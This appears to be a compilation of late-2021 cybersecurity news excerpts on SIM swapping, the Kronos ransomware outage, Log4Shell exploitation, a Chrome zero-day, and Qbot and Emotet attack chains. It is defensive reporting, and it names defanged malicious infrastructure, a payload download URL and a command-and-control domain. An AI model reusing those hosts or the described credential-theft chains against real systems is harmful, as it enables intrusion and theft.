“Originally, the SIM swap targets were the early adopters of crypto,” West said. “Now we’re seeing a lot more of what I would call normal people trying their hand at crypto, and that makes a lot more people a target. It makes people who are unfamiliar with their personal security online vulnerable to hackers whose entire job is to figure out how to part people from their money.”

West said REACT continues to train state and local law enforcement officials across the country on how to successfully investigate and prosecute SIM swapping cases.

“The good news is our partners across the nation are learning how to conduct these cases,” she said. “Where this was a relatively new phenomenon three years ago, other smaller jurisdictions around the country are now learning how to prosecute this crime.”

All of the major wireless carriers let customers add security against SIM swaps and related schemes by setting a PIN that needs to be provided over the phone or in person at a store before account changes should be made. But these security features can be bypassed by incompetent or corrupt mobile store employees.

For some tips on how to minimize your chances of becoming the next SIM swapping victim, check out the “What Can You Do?” section at the conclusion of this story.

NY Man Pleads Guilty in $20 Million SIM Swap Theft

We are fast approaching the end of the year, but there's a real chance many Americans won't be receiving that all-important paycheck to cover Christmas expenses thanks to ransomware.

As NBC News reports, payroll company Kronos was hit by a ransomware attack on Saturday, Dec. 11, which impacted its UKG solutions reliant on the Kronos Private Cloud. These are systems employers use to process time and attendance data for payroll processing and schedule management.

Kronos recommends that "customers evaluate alternative plans to process time and attendance data" because it doesn't know how long it will take to restore access. In an update on Dec. 14, Kronos admitted that, "Due to the nature of the incident, it may take up to several weeks to fully restore system availability." In other words, there's little chance the payroll system will be functioning this month.

In the latest update posted on Dec. 15, Kronos says it's exploring the available options, but that the company "strongly recommends customers consider manual time collection efforts to ensure accurate collection of employee time in the interim." Kronos also confirmed that time punch data can't currently be collected manually, which makes the situation that much more difficult for employers.

Impacted companies include GameStop, Honda, and Whole Foods, as well as several state and local government offices. Whole Foods is using paper records and doesn't think there will be a problem continuing to pay employees. Honda is currently working to minimize the disruption. The main concern right now is whether anyone who gets paid bi-weekly through UKG is going to receive any funds on their next payday (Dec. 17).

Source

The new vulnerability, assigned the identifier CVE-2021-45046, makes it possible for adversaries to carry out denial-of-service (DoS) attacks and follows disclosure from the Apache Software Foundation (ASF) that the original fix for the remote code execution bug — CVE-2021-44228 aka Log4Shell — was "incomplete in certain non-default configurations." The issue has since been addressed in Log4j version 2.16.0.

"This vulnerability is actively being exploited and anyone using Log4J should update to version 2.16.0 as soon as possible, even if you have previously updated to 2.15.0," Cloudflare's Andre Bluehs and Gabriel Gabor said.

Even more troublingly, researchers at security firm Praetorian warned of a third separate security weakness in Log4j version 2.15.0 that can "allow for exfiltration of sensitive data in certain circumstances." Additional technical details of the flaw have been withheld to prevent further exploitation, but it's not immediately clear if this has been already addressed in version 2.16.0.

The latest development comes as advanced persistent threat groups from China, Iran, North Korea, and Turkey, counting the likes of Hafnium and Phosphorus, have jumped into the fray to operationalize the vulnerability and discover and continue exploiting as many susceptible systems as possible for follow-on attacks. Over 1.8 million attempts to exploit the Log4j vulnerability have been recorded so far.

Microsoft Threat Intelligence Center (MSTIC) said it also observed access brokers leveraging the Log4Shell flaw to gain initial access to target networks that were then sold to other ransomware affiliates. In addition, dozens of malware families that run the gamut from cryptocurrency coin miners and remote access trojans to botnets and web shells have been identified taking advantage of this shortcoming to date.

While it's common for threat actors to make efforts to exploit newly disclosed vulnerabilities before they're remediated, the Log4j flaw underscores the risks arising from software supply chains when a key piece of software is used within a broad range of products across several vendors and deployed by their customers around the world.

"This cross-cutting vulnerability, which is vendor-agnostic and affects both proprietary and open-source software, will leave a wide swathe of industries exposed to remote exploitation, including electric power, water, food and beverage, manufacturing, transportation, and more," industrial cybersecurity firm Dragos noted.

"As network defenders close off more simplistic exploit paths and advanced adversaries incorporate the vulnerability in their attacks, more sophisticated variations of Log4j exploits will emerge with a higher likelihood of directly impacting Operational Technology networks," the company added.

Source

Last Friday, a public exploit was released for a critical zero-day vulnerability named 'Log4Shell' in the Apache Log4j Java-based logging platform. Log4j is a development framework that allows developers to add error and event logging into their Java applications.

The vulnerability allows threat actors to create special JNDI strings that, when read by Log4j, cause the platform to connect to and execute code at the included URL. This allows attackers to easily detect vulnerable devices or execute code supplied by a remote site or via Base64 encoded strings.

While this vulnerability was fixed in Log4j 2.15.0 and even tightened further in Log4j 2.16.0, it is being widely exploited by threat actors to install various malware, including coin miners, botnets, and even Cobalt Strike beacons.

First Log4j exploit installing ransomware

Yesterday, BitDefender reported that they found the first ransomware family being installed directly via Log4Shell exploits.

The exploit downloads a Java class from hxxp://3.145.115[.]94/Main.class that is loaded and executed by the Log4j application.

Once loaded, it would download a .NET binary from the same server to install new ransomware [VirusTotal] named 'Khonsari.'

This same name is also used as a the extension for encrypted files and in the ransom note, as shown below.

In later attacks, BitDefender noticed that this threat actor used the same server to distribute the Orcus Remote Access Trojan.

Likely a wiper

Ransomware expert Michael Gillespie told BleepingComputer that Khonsari uses valid encryption and is secure, meaning that it is not possible to recover files for free.

However, the ransom note has one oddity - it does not appear to include a way to contact the threat actor to pay a ransom.

Emsisoft analyst Brett Callow pointed out to BleepingComputer that the ransomware is named after and uses contact information for a Louisiana antique shop owner rather than the threat actor.

Therefore, it is unclear if that person is the actual victim of the ransomware attack or listed as a decoy.

Regardless of the reason, as it does not contain legitimate contact information for the threat actors, we believe this is a wiper rather than ransomware.

While this may be the first known instance of the Log4j exploit directly installing ransomware (wiper?), Microsoft has already seen the exploits used to deploy Cobalt Strike beacons.

Therefore, it is likely that more advanced ransomware operations are already using the exploits as part of their attacks.

New ransomware now being deployed in Log4Shell attacks

"Google is aware of reports that an exploit for CVE-2021-4102 exists in the wild," the browser vendor said in today's security advisory.

Although the company says this update may take some time to reach all users, the update has already begun rolling out Chrome 96.0.4664.110 worldwide in the Stable Desktop channel. 

The update was available immediately when BleepingComputer checked for new updates from Chrome menu > Help > About Google Chrome. The browser will also auto-check for recent updates and update itself automatically after the next launch.

Zero-day exploitation details not revealed

The zero-day bug fixed today, tracked as CVE-2021-4102, was reported by an anonymous security researcher and is a use after free weakness in the Chrome V8 JavaScript engine.

Attackers commonly exploit use after free bugs to execute arbitrary code on computers running unpatched Chrome versions or escape the browser's security sandbox.

While Google said it detected in the wild attacks abusing this zero-day, it did not share additional info regarding these incidents.

"Access to bug details and links may be kept restricted until a majority of users are updated with a fix," Google added.

"We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven't yet fixed."

Until the browser vendor releases additional details regarding this bug's in the wild exploitation, users should have enough time to upgrade Chrome and prevent exploitation attempts.

Sixteenth Chome zero-day fixed this year

With this update, Google has addressed 16 Chrome zero-day vulnerabilities since the start of the year.

The other 15 zero-days patched in 2021 are listed below:

• CVE-2021-21148 - February 4th
• CVE-2021-21166 - March 2nd
• CVE-2021-21193 - March 12th
• CVE-2021-21220 - April 13th
• CVE-2021-21224 - April 20th
• CVE-2021-30551 - June 9th
• CVE-2021-30554 - June 17th
• CVE-2021-30563 - July 15th
• CVE-2021-30632 and CVE-2021-30633 - September 13th
• CVE-2021-37973 - September 24th
• CVE-2021-37976 and CVE-2021-37975 - September 30th
• CVE-2021-38000 and CVE-2021-38003 - October 28th

Because this zero-day is known to have been used by attackers in the wild, installing today's Google Chrome update is strongly recommended as soon as it's available.

Google pushes emergency Chrome update to fix zero-day used in attacks

The Log4J Vulnerability Will Haunt the Internet for Years

Over the past few years, Qbot (Qakbot or QuakBot) has grown into widely spread Windows malware that allows threat actors to steal bank credentials and Windows domain credentials, spread to other computers, and provide remote access to ransomware gangs.

Victims usually become infected with Qbot through another malware infection or via phishing campaigns using various lures, including fake invoices, payment and banking information, scanned documents, or invoices.

Ransomware gangs known to have used Qbot to breach corporate networks include REvil, Egregor, ProLock, PwndLocker, and MegaCortex strains.

Due to this, understanding how threat actors infiltrate and move in a Qbot compromised environment is critical for helping defenders stop intruders before they can unleash devastating attacks.

Building blocks

In a new report, Microsoft breaks down the QBot attack chain into distinct "building blocks," which can be different depending on the operator using the malware and the type of attack they are conducting.

To illustrate an attack chain, Microsoft used Lego pieces of different colors, each representing a step in an attack.

"However, based on our analysis, one can break down a Qakbot-related incident into a set of distinct “building blocks,” which can help security analysts identify and respond to Qakbot campaigns," explains the research by Microsoft.

"Figure 1 below represents these building blocks. From our observation, each Qakbot attack chain can only have one block of each color. The first row and the macro block represent the email mechanism used to deliver Qakbot."

These different attack chains are either the result of a highly-targeted approach or an attempt to succeed in a single infiltration point by trying out multiple attack channels simultaneously. 

Even when looking at three devices targeted in the same campaign, the attackers may use three different attack chains.

For example, Device A ultimately suffers a ransomware attack, while Device B is used for lateral movement, and Device C is used to steal credentials.

The use of different attach chains in the same attack underlines the importance of analyzing all evidence in post-attack investigations, as no safe conclusions can be drawn by looking into sample logs or what occurred on one device.

Qbot attacks start with an email

Whatever happens in later stages, it is essential to underline that the QBot threat begins with the arrival of an email carrying malicious links, attachments, or embedded images.

The messages are typically short, containing a call to action that email security solutions ignore.

Using embedded links is the weakest approach, as many are missing the HTTP or HTTPS protocol in the URLs, making them not clickable in most email clients. Furthermore, the use of non-clickable URLs is likely to bypass email security solutions by not being an HTML link.

However, recipients are unlikely to copy and paste these URLs on a new tab, so the success rates drop.

However, their chances get much better when the actors hijack email threads to construct a spoofed reply.

We’ve seen this type of internal reply chain attack working successfully against IKEA recently, and it’s particularly hard for security solutions to track and stop it.

In the cases of malicious attachments, the attacks are again weak because most security products would flag ZIP attachments as potentially malicious.

The latest addition in QBot’s delivery repertoire is embedded images in the email body, which contain the malicious URLs.

Again, this is another way to evade content security tool detection, as the image is a screenshot of text urging the recipient to type the link themselves.

Doing so results in downloading a laced Excel file that carries the malicious macros that eventually load QBot on the machine.

Later building blocks

After the delivery of the email, Qbot attack chains use the following building blocks:

• Macro enablement - Every Qbot campaign delivered via email utilizes malicious macros to deliver the Qbot payload.
• Qakbot delivery - Qbot is typically downloaded as an executable with an htm or .dat exension, and then renamed to non-existent file extensions like .waGic or .wac. Microsoft notes that in many cases, the Qbot delivery includes creating a C:\Datop folder as described in this article.
• Process injection for discovery - Qbot payloads are then injected as DLLs into other processes, most commonly MSRA.exe and Mobsync.exe.
• Scheduled tasks - Creates a scheduled task so that Qbot is launched every time Windows is restarted and a user logs into the device.
• Credential and browser data theft - Steal credentials from the Windows Credential Manager and browser history, passwords, and cookies from installed web browsers.
• Email exfiltration - Steal email from infected devices that the attackers use in other reply-chain phishing attacks against employees and business partners.
• Additional payloads, lateral movement, and ransomware - This block in the attack chain is for a variety of different malicious activity and payloads, including deploying Cobalt Strike beacons, spreading laterally through the network, and deploying ransomware.

QBot distribution started spiking again in November 2021 and is helped further with the emergence of the 'Squirrelwaffle' attacks.

As QBot infections can lead to various dangerous and disruptive attacks, all admins need to become intimately familiar with the malware and the tactics it uses to spread throughout a network.

Since all infections begin with an email, it is crucial to focus your vigilance there, avoid clicking on unknown URLs or enabling macros, and provide employees with phishing awareness training.

For those interested in hunting QBot, Microsoft refreshes this GitHub repository with up-to-date queries frequently.

Microsoft: These are the building blocks of QBot malware attacks

“The internet’s on fire right now,” said Adam Meyers, senior vice president of intelligence at the cybersecurity firm Crowdstrike. “People are scrambling to patch,” he said, “and all kinds of people scrambling to exploit it.” He said Friday morning that in the 12 hours since the bug’s existence was disclosed that it had been “fully weaponized,” meaning malefactors had developed and distributed tools to exploit it.

The flaw may be the worst computer vulnerability discovered in years. It was uncovered in a utility that’s ubiquitous in cloud servers and enterprise software used across industry and government. Unless it is fixed, it grants criminals, spies and programming novices alike easy access to internal networks where they can loot valuable data, plant malware, erase crucial information and much more.

“I’d be hard-pressed to think of a company that’s not at risk,” said Joe Sullivan, chief security officer for Cloudflare, whose online infrastructure protects websites from malicious actors. Untold millions of servers have it installed, and experts said the fallout would not be known for several days.

Amit Yoran, CEO of the cybersecurity firm Tenable, called it “the single biggest, most critical vulnerability of the last decade” — and possibly the biggest in the history of modern computing.

The vulnerability, dubbed “Log4Shell,” was rated 10 on a scale of one to 10 the Apache Software Foundation, which oversees development of the software. Anyone with the exploit can obtain full access to an unpatched computer that uses the software.

Experts said the extreme ease with which the vulnerability lets an attacker access a web server — no password required — is what makes it so dangerous.

The vulnerability, located in open-source Apache software used to run websites and other web services, was reported to the foundation on Nov. 24 by the Chinese tech giant Alibaba, it said. It took two weeks to develop and release a fix.

But patching systems around the world could be a complicated task. While most organizations and cloud providers such as Amazon should be able to update their web servers easily, the same Apache software is also often embedded in third-party programs, which often can only be updated by their owners.

Yoran, of Tenable, said organizations need to presume they’ve been compromised and act quickly.

The first obvious signs of the flaw’s exploitation appeared in Minecraft, an online game hugely popular with kids and owned by Microsoft. Meyers and security expert Marcus Hutchins said Minecraft users were already using it to execute programs on the computers of other users by pasting a short message in a chat box.

Microsoft said it had issued a software update for Minecraft users. “Customers who apply the fix are protected,” it said.

Researchers reported finding evidence the vulnerability could be exploited in servers run by companies such as Apple, Amazon, Twitter and Cloudflare.

Cloudflare’s Sullivan said there we no indication his company’s servers had been compromised. Apple, Amazon and Twitter did not immediately respond to requests for comment.

Source

I Accidentally Hacked a Peruvian Crime Ring

(May require free registration to view)

Log4j is developed by the Apache Foundation and is widely used by both enterprise apps and cloud services.

Thus, while home users might have moved away from Java (although popular games like Minecraft still use it), anything from enterprise software to web apps and products from Apple, Amazon, Cloudflare, Twitter, and Steam is likely vulnerable to RCE exploits targeting this vulnerability.

Ongoing scans, exploitation of vulnerable systems

The bug, now tracked as CVE-2021-44228 and dubbed Log4Shell or LogJam, is an unauthenticated RCE vulnerability allowing complete system takeover on systems with Log4j 2.0-beta9 up to 2.14.1.

It was reported by Alibaba Cloud's security team to Apache on November 24. They also revealed that CVE-2021-44228 impacts default configurations of multiple Apache frameworks, including Apache Struts2, Apache Solr, Apache Druid, Apache Flink, and others.

After the first proof-of-concept exploit was published on GitHub yesterday, threat actors began scanning the Internet [1, 2] for systems vulnerable to this remotely exploitable security flaw that doesn't require authentication.

Additionally, CERT NZ (New Zealand's national Computer Emergency Response Team) has issued a security advisory warning of active exploitation in the wild (also confirmed by Coalition Director Of Engineering - Security Tiago Henriques and security expert Kevin Beaumont).

Nextron Systems' Head of Research Florian Roth has shared a set of YARA rules for detecting CVE-2021-44228 exploitation attempts.

Patch and mitigation available

Apache has released Log4j 2.15.0 to address the maximum severity CVE-2021-44228 RCE vulnerability.

The flaw can also be mitigated in previous releases (2.10 and later) by setting system property "log4j2.formatMsgNoLookups" to "true" or removing the JndiLookup class from the classpath.

Those using the library are advised to upgrade to the latest release ASAP seeing that attackers are already searching for exploitable targets.

"Similarly to other high-profile vulnerabilities such as Heartbleed and Shellshock, we believe there will be an increasing number of vulnerable products discovered in the weeks to come," the Randori Attack Team said today.

"Due to the ease of exploitation and the breadth of applicability, we suspect ransomware actors to begin leveraging this vulnerability immediately."

Security companyLunasec also underscored the severity of attacks using CVE-2021-44228 RCE exploits.

"Many, many services are vulnerable to this exploit. Cloud services like Steam, Apple iCloud, and apps like Minecraft have already been found to be vulnerable," Lunasec said.

"Anybody using Apache Struts is likely vulnerable. We've seen similar vulnerabilities exploited before in breaches like the 2017 Equifax data breach."

Update December 10, 11:46 EST: Cloudflare told BleepingComputer that its systems are not vulnerable to CVE-2021-44228 exploitation attempts.

"We responded quickly to evaluate all potential areas of risk and updated our software to prevent attacks, and have not been able to replicate any external claims that we might be at risk," said Leigh Ann Acosta, Cloudflare's Director of Public Relations.

New zero-day exploit for Log4j Java library is an enterprise nightmare

Secured-core devices are marketed as a solution to the increasing number of firmware vulnerabilities attackers can exploit to bypass a Windows machines' Secure Boot and the lack of visibility at firmware level in today's endpoint security solutions.

All Secured-core devices come with built-in protection for threats that abuse firmware and driver security flaws are since October 2019. They can help defend against malware designed to take advantage of driver security flaws to disable security solutions.

Credential theft blocking capabilities

The newly certified Secured-core servers use Secure boot and the Trusted Platform Module 2.0 to ensure that only trusted will be able to load on boot.

They also leverage Dynamic Root of Trust Measurement (DRTM) to launch the operating system into a trusted state, blocking malware attempts to tamper with the system.

Secured-core servers also use Hypervisor-Protected Code Integrity (HVCI) to block all executables and drivers (such as Mimikatz) not signed by known and approved authorities from launching.

"Additionally, since Virtualization-based security (VBS) is enabled out of the box, IT administrators can easily enable features, such as Credential Guard, which safeguard the credentials in an isolated environment that is invisible to attackers," Microsoft said.

By blocking credential theft attempts, Secured-core servers can help make it much harder for threat actors (including ransomware gangs such as REvil) to move laterally through the network, thus stopping their attacks before they can gain persistence and deploy their payloads.

For instance, Secured-core servers would have stopped RobbinHood Ransomware operators from exploiting a vulnerable GIGABYTE driver to elevate privileges and install malicious unsigned Windows drivers.

This made it possible to terminate antivirus and security software processes on compromised systems to bypass anti-ransomware defenses and deploy their payloads across the victim's network.

Servers running Azure Stack HCI and Windows Server

Dozens of models with Secured-core server functionality are now available in the Azure Stack HCI catalog and the Windows Server Catalog lists.

You can manage the servers' configuration and status together with all Windows clients on the network through the locally deployed and browser-based Windows Admin Center app.

"The Windows Admin Center UI allows you to easily configure the six features that encompass Secured-core server: Hypervisor Enforced Code Integrity, Boot Direct Memory Access (DMA) Protection, System Guard, Secure Boot, Virtualization-based security, and Trusted Platform Module 2.0," Microsoft added.

Redmond first announced that Windows Server 2022 will expand Secured-core to the Windows Server platform when the new release entered preview in March.

Microsoft: Secured-core servers help prevent ransomware attacks

Emotet is a malware infection that spreads through spam emails containing malicious Word or Excel documents. These documents utilize macros to download and install the Emotet Trojan on a victim's computer, which is then used to steal email and deploy further malware on the device.

Historically, Emotet would install the TrickBot or Qbot trojans on infected devices. These Trojans would eventually deploy Cobalt Strike on an infected device or perform other malicious behavior.

Cobalt Strike is a legitimate penetration testing toolkit that allows attackers to deploy "beacons" on compromised devices to perform remote network surveillance or execute further commands.

However, Cobalt Strike is very popular among threat actors who use cracked versions as part of their network breaches and is commonly used in ransomware attacks.

Emotet changes its tactics

Today, Emotet research group Cryptolaemus warned that Emotet is now skipping their primary malware payload of TrickBot or Qbot and directly installing Cobalt Strike beacons on infected devices.

A Flash Alert shared with BleepingComputer by email security firm Cofense explained that a limited number of Emotet infections installed Cobalt Strike, attempted to contact a remote domain, and then was uninstalled.

"Today, some infected computers received a command to install Cobalt Strike, a popular post-exploitation tool," warns the Cofense Flash Alert.

"Emotet itself gathers a limited amount of information about an infected machine, but Cobalt Strike can be used to evaluate a broader network or domain, potentially looking for suitable victims for further infection such as ransomware."

"While the Cobalt Strike sample was running, it attempted to contact the domain lartmana[.]com. Shortly afterward, Emotet uninstalled the Cobalt Strike executable."

This is a significant change in tactics as after Emotet installed its primary payload of TrickBot or Qbot, victims typically had some time to detect the infection before Cobalt Strike was deployed.

Now that these initial malware payloads are skipped, threat actors will have immediate access to a network to spread laterally, steal data, and quickly deploy ransomware.

"This is a big deal. Typically Emotet dropped TrickBot or QakBot, which in turn dropped CobaltStrike. You'd usually have about a month between first infection and ransomware. With Emotet dropping CS directly, there's likely to be a much much shorter delay," security researcher Marcus Hutchins tweeted about the development.

This rapid deployment of Cobalt Strike will likely speed up ransomware deployment on compromised networks. This is especially true for the Conti ransomware gang who convinced the Emotet operators to relaunch after they were shut down by law enforcement in January.

Cofense says that it is unclear if this is a test, being used by Emotet for their own network surveillance, or is part of an attack chain for other malware families that partner with the botnet.

"We don’t know yet whether the Emotet operators intend to gather data for their own use, or if this is part of an attack chain belonging to one of the other malware families. Considering the quick removal, it might have been a test, or even unintentional." - Cofense.

Researchers will closely monitor this new development, and as further information becomes available, we will update this article.

Emotet now drops Cobalt Strike, fast forwards ransomware attacks